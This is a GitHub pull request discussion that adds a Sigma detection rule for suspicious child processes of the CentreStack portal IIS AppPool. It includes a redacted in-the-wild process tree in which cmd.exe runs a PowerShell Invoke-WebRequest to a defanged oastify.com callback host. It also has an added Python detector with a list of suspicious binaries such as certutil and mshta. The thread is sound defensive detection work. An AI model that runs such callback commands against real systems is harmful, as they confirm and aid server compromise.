
new: Suspicious Process Spawn by CentreStack Portal AppPool

Open RG9n opened this issue 9 months ago • 3 comments

Summary of the Pull Request

We have observed exploitation of this in the wild today. This rule was crafted based on that exploitation.

Changelog

new: Suspicious Process Spawn by CentreStack Portal AppPool

Example Log Event

We haven't seen any false positives yet, for redaction reasons cannot share the log execution that came after here.

Fixed Issues

SigmaHQ Rule Creation Conventions

  • If your PR adds new rules, please consider following and applying these conventions

RG9n avatar Apr 11 '25 22:04 RG9n

Hi, can you give some references and a "redacted" log? Thanks

frack113 avatar Apr 12 '25 09:04 frack113

Hello @frack113, here is a redacted log:

```
|----w3wp.exe IIS APPPOOL\portal 15100 w3wp.exe -ap "portal" -v "v4.0" -l "webengine4.dll" -a \.\pipe\redact -h "C:\inetpub\temp\apppools\portal\portal.config" -w "" -m
|----cmd.exe IIS APPPOOL\portal 14784 cmd.exe /c powershell.exe Invoke-WebRequest -Uri hxxp[://]redact[.]oastify[.]com/redact
|----powershell.exe IIS APPPOOL\portal 1240 powershell.exe Invoke-WebRequest -Uri hxxp[://]redacted[.]oastify[.]com/redact
|----conhost.exe IIS APPPOOL\portal 6604 conhost.exe 0xffffffff -ForceV1
```

RG9n avatar Apr 13 '25 19:04 RG9n
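As an added illustration of the detection idea behind this PR (this is not the rule from the PR and not SigmaHQ code), the script below applies the same selection logic, a cmd.exe or script-host child spawned by w3wp.exe running as `IIS APPPOOL\portal`, to process-tree lines in the format quoted in the comment above. It assumes the line layout `|----<image> <user> <pid> <command line>`, that each line is the child of the line above it, and a child-process list that is the example's own guess, not the PR's selection; the sample trees are constructed from the redacted log.

```python
"""Added example, not the rule from this PR: apply the thread's detection idea to
process-tree lines in the format RG9n quoted. Assumptions are marked below."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample, modelled on the redacted tree posted in the thread (defanged URLs kept).
SAMPLE_TREE = r"""
|----w3wp.exe IIS APPPOOL\portal 15100 w3wp.exe -ap "portal" -v "v4.0" -l "webengine4.dll" -a \.\pipe\redact -h "C:\inetpub\temp\apppools\portal\portal.config" -w "" -m
|----cmd.exe IIS APPPOOL\portal 14784 cmd.exe /c powershell.exe Invoke-WebRequest -Uri hxxp[://]redact[.]oastify[.]com/redact
|----powershell.exe IIS APPPOOL\portal 1240 powershell.exe Invoke-WebRequest -Uri hxxp[://]redacted[.]oastify[.]com/redact
|----conhost.exe IIS APPPOOL\portal 6604 conhost.exe 0xffffffff -ForceV1
"""

# Constructed benign tree for contrast: the same AppPool compiling an ASP.NET page.
BENIGN_TREE = r"""
|----w3wp.exe IIS APPPOOL\portal 15100 w3wp.exe -ap "portal" -v "v4.0" -l "webengine4.dll"
|----csc.exe IIS APPPOOL\portal 2048 csc.exe /noconfig /fullpaths @"C:\Windows\Temp\redact.cmdline"
"""

# Assumed line layout: |----<image> <user> <pid> <command line>
LINE_RE = re.compile(
    r"^\|-+(?P<image>\S+)\s+(?P<user>IIS APPPOOL\\\S+|\S+)\s+(?P<pid>\d+)\s+(?P<cmdline>.*)$"
)

# Assumed child-process list; the PR's actual selection is not shown in the thread.
SUSPICIOUS_CHILDREN = frozenset({
    "cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
    "certutil.exe", "bitsadmin.exe", "rundll32.exe", "mshta.exe",
})
PORTAL_APPPOOL_USER = r"iis apppool\portal"


@dataclass
class ProcEvent:
    image: str
    user: str
    pid: int
    cmdline: str
    parent_image: Optional[str]  # None for the root of the tree


def parse_tree(text: str) -> List[ProcEvent]:
    """Parse the quoted tree. Assumption: each line is the child of the line above it."""
    events: List[ProcEvent] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = LINE_RE.match(line)
        if m is None:
            raise ValueError(f"unrecognised line: {line!r}")
        parent = events[-1].image if events else None
        events.append(ProcEvent(m["image"], m["user"], int(m["pid"]), m["cmdline"], parent))
    return events


def matches_rule(ev: ProcEvent) -> bool:
    """Mirror of a Sigma process_creation selection: ParentImage ends with w3wp.exe,
    User is the portal AppPool identity, Image is one of the listed binaries."""
    return (
        ev.parent_image is not None
        and ev.parent_image.lower().endswith("w3wp.exe")
        and ev.user.lower() == PORTAL_APPPOOL_USER
        and ev.image.lower() in SUSPICIOUS_CHILDREN
    )


def detect(text: str) -> List[Tuple[int, str]]:
    """Return (pid, image) for every event the rule would fire on."""
    return [(ev.pid, ev.image) for ev in parse_tree(text) if matches_rule(ev)]


if __name__ == "__main__":
    for name, tree in (("sample", SAMPLE_TREE), ("benign", BENIGN_TREE)):
        print(name, "->", detect(tree) or "no hits")
```

Only the first hop (w3wp.exe spawning cmd.exe) fires, because a process_creation rule sees one event and its parent, not the whole ancestry; the later powershell.exe and conhost.exe events have cmd.exe and powershell.exe as parents and are left for the analyst to read from the tree. The benign tree shows why the child list matters: csc.exe under the same AppPool is routine ASP.NET compilation and is not flagged.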

Since this is vuln related, I will be moving it to the ET folder.

nasbench avatar Apr 16 '25 23:04 nasbench